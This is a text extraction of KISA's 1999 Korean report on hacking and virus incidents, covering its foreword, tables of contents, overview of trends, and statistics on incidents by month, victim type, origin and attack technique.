KISA-0065(378).HWP

Size: px

Start display at page:

Download "KISA-0065(378).HWP"

영진 차
5 years ago
Views:

1 기술지원연구 정보시스템해킹ㆍ바이러스현황및 대응

2 발간사 96년에최초에발간된 정보시스템해킹현황및대응 은국내정보통신망운영및이용기관의실무자들에게해킹대응에작은역할을수행해왔으며, 특히인터넷등정보통신망의발전에따른해킹, 바이러스등각종정보범죄의역기능을대처할수있는지침서로서발전해왔습니다. 특히 1999년에는바이러스대응부분도포함하여발간하게되었습니다. 최근에는해외해커들이국내침입하는사례가매우급격하게증가하였으며, 해킹발생건수전년도에비해 3배이상증가하였습니다. 대량의호스트의취약점을손쉽게알아내는해킹도구를이용하거나, 네트워크의정상적인동작을방해하는해킹수법등보다지능적이고자동화된해킹기법을이용하는양상을보였습니다. 이에따라한국정보보호센터에서는침해사고대응지원팀을중심으로해킹사고의예방을위한각종기술문서의발간, 국제해킹사고에대비하기위한해의대응팀과의협력, 사이버금융및쇼핑몰등이슈가되는주제로기술세미나개최와 CONCERT를통한국내기관들의공동대응등많은노력을한바있습니다. 또한새천년전환시점전후에이용한 Y2K관련해킹및바이러스사고를신속히대응할수있는체계를정부, 민간등과공동으로구축하여대국민홍보, 국내정보통신망이용기관에대한무료보안취약점점검서비스, Y2K관련바이러스예보및경보및스캔공격탐지 S/W를무료로보급하는등다양한대응체제를준비하여대비하였습니다. 매년발간되는본보고서는한국정보보호센터의해킹및바이러스대응관련 1999년을결산하는자료로서해킹및바이러스방지를위해노력하는실무자들에게실질적인해킹및바이러스방지분석지침서로서의역할을하게되리라고믿습니다. 아무쪼록여러분들의많은격려와협력을기대하면서새천년에도한국정보보호센터와함께한국의해킹및바이러스방지를위해공동으로더욱노력할것을바라마지않습니다 년 12 월한국정보보호센터원장이철수 - 2 -

3 이보고서는기술개발사업의일환으로기술개발부기술지원팀의연구원들이참여하여작성하였으며, 한국정보보호센터전문가들의많은조언이있었습니다 년 12 월 사업책임자 : 연구책임자 : 참여연구원 : 부장이홍섭팀장임채호선임연구원김재성선임연구원최운호선임연구원김진원선임연구원박정현연구원정윤종연구원정현철연구원이현우연구원김상철연구원이상엽연구원조용상위촉연구원차수현위촉연구원박유리위촉연구원서효남 - 3 -

4 목차 제 1 장개요 제 2 장해킹. 바이러스현황분석제 1 절국내의해킹현황및사례분석 1. 국내해킹현황및사례분석 2. 국외해킹현황및사례분석제 2 절바이러스국내ㆍ외현황 1. 국내바이러스현황 2. 국외바이러스현황제 3 절바이러스국내ㆍ외사례분석 1. Melissa 바이러스 2. CIH 바이러스피해사례 3. Worm. ExploreZip 국내ㆍ외피해사례 4. W97M/Ths.A 국내ㆍ외피해사례 5. Worm/PretttyPark.B 6. EcoKys 국내ㆍ외피해사례 7. W97/Prilissa(Melissa.w) 국내ㆍ외피해사례 8. W32/Fix(Fix2001) 국내ㆍ외피해사례 9. W32/NewApt 국내ㆍ외피해사례 10. Win32/MyPics 국내ㆍ외피해현황 제 3 장최근해킹ㆍ바이러스대응방안제 1 절최신해킹기법동향및대응 1. 분산환경에서의서비스거부공격 2. Millennium Internet Worm 공격 3. RPC 관련보안취약점및대책 4. 트로이목마와백도어분석및대책 5. 윈도우시스템해킹과대책 - 4 -

5 제 2 절최근바이러스동향및대응 1. 99년주요바이러스분석 2. 최근바이러스대응책제 3 절국내해킹ㆍ바이러스대응활동현황 1. 국내외침해사고대응팀활동현황 제 4 장 Y2K관련바이러스및해킹대응활동현황제 1 절개요제 2 절 Y2K관련바이러스대응활동 1. Y2K 관련출현가능한컴퓨터바이러스유형분석 2. Y2K 문제와바이러스ㆍ해킹문제구별지침보급 3. Y2K관련바이러스해킹비상대응체계구축ㆍ운영제 3 절 RTSD, K-COPS 현황 1. RTSD 현황 2. K-COPS( 해킹취약점점검서비스 ) 현황 제 5 장정보보호상담및기술봉사반활동현황제 1 절개요제 2 절정보보호상담실활동 1. 정보보호상담실목적 2. 정보보호상담분야 3. 99년도정보보호상담현황 4. 활동결과분석 참고문헌 부록 A. CONCERT 회원기관및연락처 A1. 운영위원회 A2. 일반회원 A3. 개인회원 - 5 -

6 부록 B. FIRSTㆍAPSIRC 회원기관및연락처 Bl. FIRST 회원기관및연락처 B2. APSIRC 회원기관및연락처부록 C. 바이러스대응기관연락처 C1. 한국정보보호센터컴퓨터바이러스전담반 C2. 바이러스ㆍ해킹사고등컴퓨터범죄수사연락처 C3. 백신제작업체연락처 C4. 데이터백업및복구기술지원연락처 C5. 방역서비스긴급연락처부록 D. 한국정보보호산업협회회원사목록 부록 E. 국내의정보보호관련 URL 목록 E1. 국내 URL E2. 국외 URL 부록 F. 정보보호관련공개 S/W 현황 F1. Packet Filtering & 접근제어도구 F2. 보안취약점 Scanner F3. Scanning 역탐지도구 F4. 네트웍모니터링도구 F5. 시스템내부취약점점검도구 F6. 패스워드 & 인증관련보안도구 F7. 암호화체크섬 (Checksum) 도구 F8. 보안강화용대체프로그램 F9. Windows95/NT 보안도구 - 6 -

7 부록 G. 운영체제별 '99년도보안취약점및패치 URL 목록 G1. Linux G2. AIX G3. Digital G4. IRIX G5. HPUX G6. Solaris/Sun G7. WindowsNT 부록 H. '99 해킹방지기술권고문현황 H1. CERTCC-KR 보안권고문 H2. 미국 CERT/CC 보안권고문 H3. 미국 CIAC 보안권고문 H4. 호주 AUSCERT 보안권고문부록 I. '99 바이러스예보및경보현황 부록 J.'99 정보보호관련기술이전현황 J1. 기술이전현황 J2. 이전기술소개부록 K. 해킹및바이러스언론보도 K1. 경향신문 K2. 국민일보 K3. 대한매일 K4. 동아일보 K5. 매일경제 K6. 서울경제 K7. 연합뉴스 - 7 -

8 K8. 전자신문 K9. 조선일보 K10. 중앙일보 K11. 한겨레신문 K12. 한국경제 K13. 한국일보 - 8 -

9 표목차 [ 표 2-1] 기관별해킹피해건수 [ 표 2-2] 국내국제간의피해관계 [ 표 2-3] 국외협력현황 [ 표 2-4] 해킹기법별발생현황 [ 표 2-5] 연도별해킹사고변화 [ 표 2-6] 연도별국외해킹사고발생현황 [ 표 2-7] '99년연도별바이러스현황 [ 표 2-8] '99년도바이러스종류별현황 [ 표 2-9] '99년출처별바이러스현황 [ 표 2-10] 외국 CIH 국가별피해현황 [ 표 3-1] trinoo 공격예 (1) [ 표 3-2] trinoo 공격예 (2) [ 표 3-3] TFN 데몬실행결과 [ 표 3-4] 네트워크에서탐지된 trinoo 공격 [ 표 3-5] 포트스캔을통한탐지 trinoo공격 [ 표 3-6] mworm 공격패턴 [ 표 3-7] mworm 공격스크립트 [ 표 3-8] mworm 쉘스크립트 [ 표 3-9] mworm의 myrand() [ 표 3-10] mwd-mount 스크립트 [ 표 3-11] mworm 공격패턴 [ 표 3-12] rps.statd 공격프로그램일부 [ 표 3-13] rstatd 데몬스캔형태 [ 표 3-14] automountd 취약점공격 [ 표 3-15] 대표적인트로이목마와뒷문프로그램사례 [ 표 3-16] 트로이목마와뒷문프로그램 [ 표 4-1] Y2K문제와바이러스ㆍ해킹문제구별방법 [ 표 4-2] Y2K관련바이러스ㆍ해킹비상대응반참여기관현황 [ 표 4-3] 비상대응상황실대응활동실적 [ 표 4-4] 바이러스신고접수현황 [ 표 4-5] RTSD 스캔공격탐지현황 - 9 -

10 [ 표 4-6] 기관별 K-COPS 신청건수 [ 표 4-7] 신청기간별서비스현황 [ 표 4-8] 취약점점검건수 [ 표 4-9] 신청기관별취약점점검건수 [ 표 5-1] 월별상담현황 [ 표 5-2] 정보보호분야별상담현황 [ 표 5-3] 기관별정보보호상담현황 [ 표 I-1] '99년주요바이러스와대응현황 [ 표 I-2] Y2K관련신종컴퓨터바이러스경보현황 [ 표 J-1] 침입탐지시스템분류 [ 표 J-2] 침입탐지시스템비교 [ 표 J-3] 감사기록수집기의기능 [ 표 J-4] 침입분석기의분류 [ 표 J-5] OLID시스템개발환경 [ 표 J-6] 탐지모듈생성기의 Yacc 문법 [ 표 J-7] 대표적인보안관리, 점검도구 [ 표 J-8] 취약점복구유형별세부복구방법예 [ 표 J-9] 패스워드그룹의세부정책구성 [ 표 J-10] 파일전송그룹의세부정책구성 [ 표 J-11] 사용자환경그룹의세부정책구성 [ 표 J-12] 관리자환경그룹의세부정책구성 [ 표 J-13] 네트워크그룹의세부정책구성 [ 표 J-13( 계속 )] 네트워크그룹의세부정책구성

11 그림목차 ( 그림 1-1) 해킹기법변천과정 ( 그림 2-1) 월별해킹사고접수현황 ( 그림 2-2) 기관별해킹사고접수현황 ( 그림 2-3) 연도별해킹사고변화 ( 그림 2-4) 백오리피스화면 ( 그림 2-5) 해킹당한 H 대학의홈페이지 ( 그림 2-6) 미상원의원홈페이지와해킹으로변조된화면 ( 그림 2-7) '99년연도별바이러스현황 ( 그림 2-8) '99년도바이러스종류별현황 ( 그림 2-9) 연도별국의바이러스증가추이 ( 그림 2-10) 바이러스확산경로 ( 그림 2-11) 연도별바이러스감염원인변화추이 ( 그림 3-1) trinoo 공격개념도 ( 그림 3-2) tripwire 동작개념 ( 그림 3-3) 백오리피스메인화면 ( 그림 3-4) 백오리피스를이용한파일유출 ( 그림 3-5) 백오리피스설치확인 ( 그림 3-6) 레지트리편집기에서확인된백오리피스 ( 그림 3-7) Deep Throat 초기화면 ( 그림 3-8) Netbus 다운로드화면 ( 그림 3-9) Sub 7 초기화면 ( 그림 3-10) 백오리피스전용탐지도구 ( 그림 3-11) 백오리피스 2000 전용탐지도구 ( 그림 3-12) 트리이목마탐색도구화면 (1) ( 그림 3-13) 트리이목마탐색도구화면 (2) ( 그림 3-14) Window Spawner 공격 ( 그림 3-15) Java Applet Killer ( 그림 3-16) 전자메일을통한자료유출 ( 그림 3-17) Frame Spoofing 공격화면 ( 그림 3-18) Netscape Web Browser보안설정 ( 그림 3-19) Internet Explorer Web Browser보안설정

12 ( 그림 3-20) mirc의웹바이러스방지설정 ( 그림 3-21) nuke 공격프로그램 ( 그림 3-22) WinGenocide 프로그램 ( 그림 3-23) mirc의웜바이러스방지설정 ( 그림 3-24) Netscape의자바보안설정 ( 그림 3-25) Explore의자바보안설정 ( 그림 4-1) Y2K관련바이러스ㆍ해킹비상대응체계도 ( 그림 4-2) 비상대응상황실관련홈페이지화면 ( 그림 4-3) 비상대응상황실대응업무절차 ( 그림 4-4) 전체시스템개요 ( 그림 4-5) RTSD Agent/RTSD Manager 구성도 ( 그림 4-6) K-COPS 화면 ( 그림 4-7) K-COPS 기관별신청현황 ( 그림 4-8) 발견된취약점별비율 ( 그림 5-1) 월별상담실적변화 ( 그림 5-2) 기관별상담비율 ( 그림 J-1) 네트워크침입탐지시스템개념도 ( 그림 J-2) OLID시스템구성 ( 그림 J-3) 침입탐지분석구성요소 ( 그림 J-4) Oversize ICMP 공격탐지 ( 그림 J-5) OLID시스템구조 ( 그림 J-6) 쓰기제한된파일 / 디렉토리에대한침입행위탐지 ( 그림 J-7) OLID시스템초기화면 ( 그림 J-8) 침입탐지규칙설정 (Address & Prot Probing) ( 그림 J-9) 침입탐지규칙설정 (DOS & Vulnerable port Probing) ( 그림 J-10) 침입탐지규칙설정 (Input Command Pattern) ( 그림 J-11) 침입탐지동작화면 ( 그림 J-12) 침입상태설명및침입통계현황화면 ( 그림 J-13) 실시간침입탐지시스템의태동 ( 그림 J-14) 침입탐지시스템의탐지영역 ( 그림 J-15) 호스트기반침입탐지시스템의전체구조 ( 그림 J-16) 침입탐지시스템구조 ( 그림 J-17) audit trail에기록되는 token 종류

13 ( 그림 J-18) 패턴의 Petri-Net 구성과자료구조표현 ( 그림 J-19) 침입상황표시기화면 ( 그림 J-20) 보안취약점자동복구시스템전체구성도 ( 그림 J-21) 보안취약성자동패치시스템구조 ( 그림 J-22) 사용자인증화면 ( 그림 J-23) 시스템의초기화면 ( 그림 J-24) 점검수행결과화면 ( 그림 J-25) 복구정책설정화면 ( 그림 J-26) 복구완료확인화면

14 제 1 장개요

15 제 1 장개요 96년부터시작한 해킹현황및대응 보고서는매년발간하여올해로써 4회째를맞이하게되었다. 그동안이보고서는매년그해동안의해킹등침해사고에대한총정리와분석자료를제공함으로써국내정책수립과정보보호산업체들의마케팅자료등에이용되기도하였고해킹에대한문외한들이현황과기본적인개념을이해하는데도움을주기도하였다. 1980년대중반부터시작된해킹과바이러스는세기말이되기까지그패러다임의변화가매우변하여왔으며해킹기법도상상하지못할수준으로발전되어왔다. 이는인터넷의상업화에따르는비약적인팽창과정보시스템기술과정보보호기술의변화에도영향을받은것이라고볼수있다. 유닉스가인터넷서버로주종을이루고있을때시스템에대한직접적인해킹침투는윈도우혹은 NT서버, 익스플로러등마이크로소프트사의제품과리눅스기종등인터넷에서많이활용되는기종과제품들이해커들의목표가되고있는경향을보이고있다. 특히일반인이많이이용하고있는윈도우PC를겨냥한바이러스공격은웜 (Worm) 바이러스, 트로이목마형바이러스등해킹기법을응용한기법들이주류를이루어가고있어바이러스와해킹의경계가모호해지는경향을보이고있다. 그리고시스템과네트워크파괴를노리는서비스거부공격은인터넷이용기관뿐아니라국내인터넷전체의혼란을가져올정도로막강한기법들이출현하고있는실정이다. ( 그림 1-1) 해킹기법변천과정

16 또한 '99년들어해킹과바이러스건수도가파른증가추세를보여주고있으며이러한증가추세는비단국내뿐아니라전세계적으로도공통된현상이므로새천년을맞이하는마음가짐이달라야할것이다. '99년해킹바이러스등침해사고의특징은다음과같이요약할수있다. o 해킹사고의급격한증가 '98년 158건이던해킹사고보고가 '99년 572건으로 3.5배증가하였다는사실이다. mscsn, sscan 등보다뛰어난해킹취약점분석도구의개발로누구나해킹이손쉬워졌다는점에기인한것이다. 뿐만아니라 KISA의침해사고대응팀의존재가국내의널리알려진점도한몫을하였을것이다. o 해킹취약점탐지공격및버퍼오버플로우해킹기법이가장많아해커들이이용한해킹수법중가장많은방법으로서해킹을시도하기전에우선대상시스템의취약요소를파악하려한것이다. 그리고 '99년부터시도되기시작한원격지에서의버퍼오버플로우공격은관리자권한을손쉽게빼낼수있는방법으로서 SUN Solaris 가주된표적이되고있다. o 해외해커들의국내해킹이가장많아 '98년과마찬가지로해외해커들의국내기관해킹경우가가장많은건수를차지하고있다. 국내해커가해외로공격한 24건까지포함한전체 596건중해외해커의침입이 46% 를차지하고있으며기록미비로확인이어려운경우 41.9% 의많은부분이해외해커의침입일것으로추정되므로 70% 이상이될것으로보인다. o 대학, 초ㆍ중ㆍ고등학교등교육기관과중소기업이많은피해교육기관이가장많은피해를보았으며그밖에웹호스팅등소규모인터넷사업을하는업체들의해킹피해도많은것으로나타났다. o 윈도우PC 및리눅스해킹사고의증가 '99년중반에발표된백오리피스2000(BO2K) 경우는전세계누구나개인이소지한 PC 를제어할수있는해킹기법으로써자리잡게되었고개인이해킹피해를신고하는경우도증가하고있다. 또한리눅스가많은인터넷서버로활용되면서리눅스도해킹대상이되고있다

17 o 악성바이러스의증가윈도우용악성바이러스는주로전자우편첨부로전달되는웹바이러스가주류를이루고있으며또한 Ecokys처럼트로이목마형태도주류를이루어가고있다. 새천년에는 99년도에뉴밀레니엄을겨냥하여출몰하였던새로운해킹기법과더불어다음과같은특징적인해킹및바이러스기법들이출몰할것으로보인다. ㅇ대규모혼란과파괴를노리는분산집중서비스거부공격해킹ㅇ윈도우2000과리눅스의해킹취약점을노리는해킹이나바이러스ㅇ해킹기법을응용한것보다자동전파가능웹바이러스및유닉스용바이러스ㅇ자바스크립트, 쿠키, 액티브액스등웹기반악성코드에의한개인정보유출등ㅇ신종응용프로그램의해킹취약점에대한끊임없는공격시도 인간이제작하는응용프로그램은항상버그와취약점이존재그밖에도더나아가특정하드웨어플랫홈에상관없는지능형해킹및침투로봇등도예측될수있다. 지금까지해킹과바이러스는호기심과영웅심리등에의한학생들의해킹 (Recrational Hacker) 이주종을이루었고, 일부행동주의자가해키비스트 (Hackvist) 로서물의를일으키기도하였다. 하지만새천년부터는범죄적인해킹이눈에띄게나타날것이다. 인터넷금융시스템에대한해킹시도, 전자상거래운영기관등에대한해킹으로금전적인이익을추구하는경우가많아질것이며대기업등에침입하여기업기밀정보를빼가는행위들도많아질것이다. 이러한이윤추구형해킹은일반사회생활에서보이는범죄와다를바없는상황이될것이다. 하지만무엇보다도우려되는해커들의동기로서는국가간의사이버공격이될것이다. 모든국가가컴퓨터에의한중요기간시설과정보시스템제어가이루어지고있는상태에서이제인터넷을이용한정보교환이필수적으로되고있으므로다른국가가마음만먹는다면파괴와혼란을불러일으킬수있는것이다

18 여기에는은밀한침투, 서비스거부공격에의한시스템과네트워크의마비, 성능저하를목적으로한사이버공격이있다. 물론이러한공격은국가의정보기관, 국방기관들이직접문제를일으킬수도있으나해커집단을사주하여공격할수도있다. 해킹과바이러스공격에제대로대응하기위해서는한두개의전문기관이나정부기관이나서서는되지않는다. 국가적차원에서보다우수한정보보호시스템과기술개발을지원하여야하며, 전사회적으로적용할수있는법과제도의정비가필요하며또한정보통신망운영기관들이최소한의정보보호예산을마련할수있도록하여야한다. 또한각업체들이제작하는시스템도해킹이나바이러스에의한침해가발생하지않도록안전한개발체제를갖추어야할것이다. 그리고무엇보다도중요하게국가가추진하여야할사항은실무자들의재교육과정보보호산업에서요구되는전문인력양성이다. 새천년에도정보보호가최대의화두가될것이고각국들이경쟁적으로사이버공격에대한대비책마련에서두르고있다는점을볼때기업과공공기관에서근무하는정보통신담당자들을정보보호전문가도재교육할수있는교육여건마련과체계마련이시급한실정이다. 또한대학에서도정보보호산업체와정보통신망운영기관에서필요로하는전문가들을배출할수있도록전문교육을실시하여야할것이다. 한국정보보호센터의기술지원팀은지금까지해킹대응과바이러스대응, 기술봉사반등을침해사고대응지원팀 (CERTCC-KR) 이름으로국내의지원과협력을진행하였다. 이러한기능을더욱활성화하고구체적인기술지원과봉사를위하여기술봉사팀으로이름을개정하고해킹및바이러스대응, 기술자문및상담등으로업무체계를단순화하고역량을집중하여보다전문적이고선도적인기술력향상과함께활발한대의사업을추진할예정이다. 특히봉사팀전원이모든문제를해결하고대응할수있도록체계를마련하고적극적인기술지원을할것이다. 여기에는정부공공기관에대한전문적인컨설팅과기술협력을마련해나갈것이며, 민간기업등대학을위해서는자체적인기술력향상을도모할수있도록침해사고대응지원팀 (CONCERT) 의자체협력체계를보다강화할것이다. 그리고무엇보다도국내해커들을선도하여보다건전하게민간에대한기술지원과봉사로보람을가질수있도록선도하기위하여해킹막는해커들의봉사단을결성하고지원할예정이다

19 이러한기술지원체계는최근 Y2K관련바이러스ㆍ해킹대응체계운영경험과지원활동을연장하여보다효과적으로지원할수있는방안을모색하고자한다. 그리고이러한대의자문상담및지원체계는 CONCERT 활동체계내에서국내정보보호컨설팅전문업체등과도연계하여공동으로기술력역량을구축할수있는포럼을구성할예정이다. 여기에는해킹막는해커들의봉사단등과공개적으로해킹과바이러스기법등을토의하는장도만들어갈것이다. 기술봉사팀이고려하는자문상담등대외지원에는정보보호전문기술교육과정운영도빼놓을수없는부분이다. 지금까지정보보호센터가운영하여오던일반적인실무자교육과정은지양하고 2주과정등 OJT(On the Job Training) 교육과정에초점을맞추어실습을겸한과정으로개편하고전문해킹기법과방지기술교육도개설하고자한다. 이보고서를통하여 '99년해킹및바이러스사고의통계, 분석등과국내외대응현황, 각종기술적인자료를보이고자한다

20 제 2 장해킹ㆍ바이러스현황분석

21 제 2 장해킹ㆍ바이러스현황분석 제 1 절국내외해킹현황및사례분석 1. 국내해킹현황및사례분석 가. 국내해킹현황본절에서는국내의해킹피해기관및국외 CERT팀들로부터 CERTCC-KR에접수된해킹사고를근거로월별해킹사고현황, 기관별해킹사고현황, 국내ㆍ국제간의피해관계그리고해킹기법등을분석하였다. (1) 월별해킹사고발생현황 ( 그림 2-1) 은 '99년월별국내해킹사고접수현황이다. ( 그림 2-1) 월별해킹사고접수현황 '99년초반기에는약 2~30건의해킹사고가접수되었으며중반기에약 40여건의해킹사고가접수되었고, 연말경에는약 100여건으로해킹사고가급속히증가하였음을보여주고있다. 매년해킹사고가꾸준히증가하고있는데 '99년한해동안도역시이러한증가추세가멈추지않았음을알수있다. 11월에해킹사고가 116건으로급격하게증가한것은미국에너지성산하의 CERT팀인 CIAC 1) 의해킹사고접수에기인한다. 1) CIAC(Computer Incident Advisory Capability) : 미국에너지성 (Department of Energy) 산하기관들의해킹사고지원을위한대응팀

CIAC에서는미에너지성시스템을공격한한해커를검거하여수사하는과정에서지난 6월~11월동안 59개기관 179개의국내시스템이해킹당하였을가능성이있다고 CERTCC-KR에보고하였다. 실제이들시스템들중일부를분석해본결과미국등지로부터해킹을당하여이미시스템관리자권한을도용당한상태였다.

22 CIAC에서는미에너지성시스템을공격한한해커를검거하여수사하는과정에서지난 6월~11월동안 59개기관 179개의국내시스템이해킹당하였을가능성이있다고 CERTCC-KR에보고하였다. 실제이들시스템들중일부를분석해본결과미국등지로부터해킹을당하여이미시스템관리자권한을도용당한상태였다. 12월에는 CIAC에서의사고보고등특별한사건이없었음에도불구하고 96건이라는엄청난수의해킹사고가접수되었는데이는연말을기해인터넷의정상적인서비스를할수없도록방해하기위한해커들이갖가지도구를이용하여해킹시도를하였기때문으로분석된다. 12월경에바이러스와마찬가지로자기복제능력을가진밀레니엄인터넷웜이국내피해시스템에서발견되기도하였으며대규모의피해시스템을이용하여특정시스템을공격하는서비스거부공격도구가발견되기도하였다. 다음 [ 표 2-1] 은월별해킹피해기관을나타내고있다. 12월에지역도메인에대한해킹사고가다수접수되었는데이들은대부분초ㆍ중등학교의리눅스서버로방학기간동안시스템관리자의관리소홀로인해지속적으로공격을당하였다. [ 표 2-1] 기관별해킹피해건수

23 (2) 기관별피해현황기관별해킹피해접수현황 (( 그림 2-2) 참조 ) 을살펴보면대학이 262건 (45.8%) 로가장많은해킹사고가접수되었으며일반기업이 248건 (43.4%) 로두번째로많은사고가접수되었고, 지역등의기타가 29건 (5.1%), 비영리기관이 22건 (3.8%), 연구소가 11건 (1.9%) 순으로접수되었다. ( 그림 2-2) 기관별해킹사고접수현황 대학과일반기업이 89.2% 로대부분의해킹사고가발생하고있는이유는다음과같이분석할수있다. 우선가장많은해킹사고가발생된대학의경우시스템및네트워크규모가방대하며사용자또한교수, 교직원, 학생등대단히다양하여보안정책을세우기가쉽지않다. 또대부분의대학해킹사고는대학의주요서버이기보다는각연구실에서운영하고있는리눅스서버가해킹피해가심각한것으로나타났다. 일반기업의경우도대부분의해킹사고는보안에대한대책을세울만한여력이없는중소업체또는웹호스팅업체에서발생하였다. 반면에대기업의경우최근침입차단시스템등보안도구를활용하여보안을강화하고있어해킹사고피해가적은것으로분석되고있다. (3) 국내ㆍ국제간의피해관계국내ㆍ국제간의피해관계 ([ 표 2-2] 참조 ) 를살펴보면국내에서국외로의해킹시도및공격은 24건 (4.0%) 인데반해국외에서국내시스템에대한해킹시도및공격은모두 274건 (46.0%) 에달하고있다

24 [ 표 2-2] 국내국제간의피해관계 피해경로를분석할수없는경우는공격자가추적을피하기위해로그를삭제하거나피해기관에서자체적으로분석한경우로써이들중에서도많은부분이국외에서의침입이있을것이라고보고있다. 국외공격자의경우국내시스템에침입하여홈페이지변조, 시스템파괴, 중요정보유출등시스템에심각한피해를입히는경우도있으나, 대부분국내시스템을타기관침입을위한중간경유지로이용하고있다. 하지만이러한경우도공격자가이미시스템관리자권한을도용한상태이므로언제든시스템에막대한피해를입힐수도있다. 국내에서국내시스템에대한공격은 48건 (8.1%) 발생하였으며이들은대부분백오리피스등윈도우즈시스템에대한공격이었다. 또한 CERTCC-KR과국의 CERT 팀등과활발한정보교환이이루어졌는데올한해동안국외에서접수된해킹사고건수는다음표와같다. [ 표 2-3] 국외협력현황 국가 기관 건수 DOD CERT 11 미국 ORNL 59 CIAC 27 NASA 2 유럽 EuroCERT 6 영국 JANET-CERT 40 독일 DFN-CERT 17 프랑스 CERT-RENATER 25 네덜란드 CERT-NL 7 호주 AUSCERT 27 핀란드 FunetCERT 4 스페인 IRIS-CERT 7 슬로베니아 SI-CERT 1 일본 JPCERT 5 기타 122 계

25 이처럼 CERTCC-KR에접수되는사고중절반이넘는수의사고가국외로부터접수되고있으며, 국내에서도피해시스템을분석하는과정에서발견되는국외관련정보는관련기관및 CERT팀에제공함으로써협력체제를구축하고있다. (4) 해킹기법에따른분류보통해킹기법을분류하는방법은국제적으로다양한방법들이알려져있다. 단순히해킹을당할수있는시스템의취약점위주로분류하는방법이있으며해킹으로인한영향, 위험성등에의해서도분류하는방법이있다. 침입차단시스템 (Firewall) 공개 SW를최초로개발한 Marcus J. Ranum 은해커들이이용하는방법에따라일반적으로분류한방법을소개하였으며한국정보보호 CERTCC-KR에서도이분류방법을일부확장하여다음 10가지로분류하였다. ㅇ사용자도용 (Impersonation) : 보통가장일반적인해킹방법으로알려져있는데다른일반사용자의 ID 및패스워드를도용하는방법으로서 sniffer 등을이용하여정보를알아낸후시도하게된다. ㅇ SW 보안오류 (SW Vulnerability) : 컴퓨터내의시스템 SW나응용소프트웨어의버그등을이용한공격방법이다. ㅇ버퍼오버플로우취약점 (Buffer Overflow) : 최근많이이용되고있는방법으로서소프트웨어변수관리상의문제인오버플로우버그를이용하여불법으로명령어를실행하고나권한을가지는방법이다. ㅇ구성설정오류 (Configuration Vulnerability) : 시스템 SW의설치나운영상에오류를이용한공격방법이다. ㅇ악성프로그램 (Malicious Codes) : 바이러스, 웜등의공격이나침입후설치하는뒷문프로그램, 트로이목마등이다. ㅇ프로토콜취약점 (Protocol Infrastructure Error) : 인터넷의통신프로토콜인 TCP/IP 의설계취약점을이용한구조적인공격기법이다. ㅇ서비스거부공격 (Denial of Service Attack) : 시스템이나네트워크의정상적인동작과서비스를방해하거나정지시키는공격이다. ㅇ E-Mai1 관련공격 ( Vulnerability) : 전자우편폭탄, 스팸메일공격이다. ㅇ취약점정보수집 (Vulnerabilties Probing) : 어떤시스템을공격하기전에시스템의취약점을알아내고자하는스캔공격이다

26 ㅇ사회공학 (Social Engineering) : 관리자를속여패스워드를알아내거나권한을얻어내는방법이다. 이러한분류법에의해 '99년한해동안접수된해킹사고에서사용된해킹기법은 [ 표 2-4] 와같다. 이표에서밝히고있는해킹기법별건수는한해킹사고에중복된해킹기법이사용될수도있으며, 해킹기법이정확히밝혀지지않은사고도존재할수있으므로해킹사고접수건수와일치하지않는다. [ 표 2-4] 해킹기법별발생현황 분류 공격방법 횟수 비고 sniffer 38 네트워크모니터링에의한사용자 ID 및패스워드도용 사용자도용 brute force 4 사전공격 (dictionary attack) 등 (68) crack 6 패스워드크랙킹 디폴트계정도움 2 SGI 디폴트계정도용 S/W 보안오류이용 (3) 기타 18 PC 통신 ID 도용등 phf-cgi 3 phf 취약점이용패스워드파일유출등 popd 19 imapd 22 mountd 45 named 16 버퍼오버플로우취약점 (214) amd 23 ftpd 32 rpc.statd & automountd 20 rpc.ttdbserver 2 rpc.cmsd 6 ufsrestore 1 기타 28 기타 RPC 취약점이용등 구성ㆍ설정오류 (2) 신뢰관계이용 1.rhosts 설정오류이용 기타 1 Back Orifice 25 NetBus 1 악성프로그램 (58) rootkit 27 백도어 3 인터넷웜 1 밀레니엄인터넷웜 기타 1 프로토콜취약점 (0)

27 분류공격방법횟수비고 smurf 9 trinoo 3 서비스거부공격 (16) 관련공격 (20) 취약점정보수집 (272) 시회공학 (4) ping flooding 1 SYN flooding 1 nuke 1 기타 1 spam mail 19 스팸릴레이공격 mail bomb 1 mscan 41 sscan 5 imapd scan (143 port) 21 popd scan (110 port) 9 named scan (53 port) 3 ftpd scan (21 port) 24 CGI scan (80 port) 1 SUN RPC scan (111 port) 60 백오리피스 scan (31337 port) port 스캔 Net Bus scan (12345 port) port 스캔 port scan 89 기타 10 패스워드노출등 4 우의결과에서볼수있는것과같이취약점정보수집공격이 272건발생하여가장많은공격이이루어진것을알수있다. 취약점정보수집공격은시스템에불법적인침입을하기위한사전준비단계로서해킹가능한보안취약점을찾기위한공격이다. 지난 '98 년에발표된 mscan, '99년 1월에발표된 sscan 등해킹가능한보안취약점을자동으로탐색하여주는많은스캔공격도구들이공개되었으며, 해커들이침입에앞서취약한시스템들을찾기위해이러한도구들을많이활용하고있음을알수있다. 또한최근 rpc 관련서비스들에취약점이발견되어공격의목표가되고있는데역시이들취약한 rpc 서비스를찾고자하는 RPC 스캔공격이 60건으로많이발생하였다

28 버퍼오버플로우취약점을이용한공격은 214건발생하였는데이는실제시스템에불법적인침입을위해서사용되고있다. '99년한해동안시스템에불법적인침입은대부분이러한버퍼오버플로우버그로인해발생되었다는것을알수있다. 특히, 버그가알려진 RPC 서비스들이주요공격의목표가되었다. 리눅스레드헷 5.x 버전의경우 mountd에의해많은공격을당하였고 (CIAC에서보고된많은피해예상시스템들도 mountd에의한공격을받았었음 ), 레드헷 6.x 버전의경우 amd 취약점에의해많은공격을당하였다. 또, 지난 '98년과는달리 '99년도에는리눅스서버뿐만아니라중형시스템인솔라리스도피해접수가많이되었다. 솔라리스시스템의해킹에사용된기술은 rpc.cmsd, rpc.ttdbserve, rpc.statd & automountd, rpc.sadmind 등이었다. 사용자도용공격에서는 sniffer를이용한사용자도용이 38건으로가장많이발생하였는데이는공격자들이시스템을공격한후동일네트워크의패킷을모니터링하여쉽게타시스템에침입할수있기때문에해커들사이에서많이사용되고있음을알수있다. 관리자의실수또는부주의에기인할수있는구성ㆍ설정상의오류를이용한공격은신뢰관계설정오류등 2건만이발견되었지만이러한오류를이용한성격상탐지가힘들므로실제더많은공격이있을수있다고볼수있다. 악성프로그램을이용한공격은윈도우즈시스템에서백오리피스공격이 25건, NetBus 공격이 1건발생하였다. 백오리피스는윈도우즈시스템공격에가장많이사용되고있으며일반사용자들도 NOBO 등백오리피스탐지시스템을설치하여모니터링하고있어침입시도시즉시신고함으로써사고접수건수가많은것으로분석된다. 유닉스시스템에서는 rootkit에의한공격이 27건으로가장많았는데공격자가시스템공격후 